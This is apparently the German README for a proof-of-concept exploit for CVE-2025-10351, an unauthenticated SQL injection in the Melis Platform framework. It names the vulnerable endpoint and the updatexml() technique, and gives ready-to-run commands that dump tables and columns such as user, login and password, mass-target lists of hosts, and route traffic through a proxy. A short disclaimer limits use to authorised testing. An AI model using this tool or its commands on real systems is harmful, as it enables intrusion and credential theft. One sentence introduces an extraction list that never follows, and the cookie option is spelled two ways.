
Exploit für CVE-2025-10351. SQL Injection auf dem Melis Platform Framework
POC für CVE-2025-10351: Eine nicht authentifizierte SQL-Injection-Schwachstelle, die einen bestimmten Endpunkt im Melis Platform Framework betrifft.
Dieser POC zielt auf eine nicht authentifizierte fehlerbasierte SQL-Injection-Schwachstelle im Endpunkt:
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
Er nutzt updatexml() in MySQL aus, um Folgendes zu extrahieren:
Er erkennt auch mögliche zeitbasierte SQLi-Vektoren für weitere manuelle Ausnutzung.
Installiere Abhängigkeiten mit:
pip3 install -r requirements.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
python3 CVE-2025-10351-POC.py -l targets.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
tables_extracted.txt<table_name>_data.txtDieses Dokument dient ausschließlich der autorisierten Sicherheitstests und Abhilfe. Verwende den PoC oder die Reproduktionsschritte nicht gegen Systeme, die dir nicht gehören oder für die du keine ausdrückliche Erlaubnis zum Testen hast. Der Autor übernimmt keine Verantwortung für Missbrauch.
Hergestellt mit ❤️ von Manuel Iván San Martín Castillo
| Argument | Beschreibung |
|---|
-u | Ziel-URL |
-p | Port (80, 443, usw.) |
-l | Datei mit einer Liste von URLs |
-s | Schlafzeit für zeitbasierte Tests (Standard: 1s) |
-at | Alle Tabellennamen ausgeben |
-t | Tabellennamen angeben |
-ac | Alle Spalten der angegebenen Tabelle ausgeben |
-c | Kommagetrennte Liste der auszugebenden Spalten |
--proxy | Burp Proxy http://127.0.0.1:8080 |
--insecure | TLS-Prüfungen bei Proxy-Verbindungen deaktivieren |
--cookie | Cookies für Authentifizierungsanfragen |
--debug | Debug-Modus |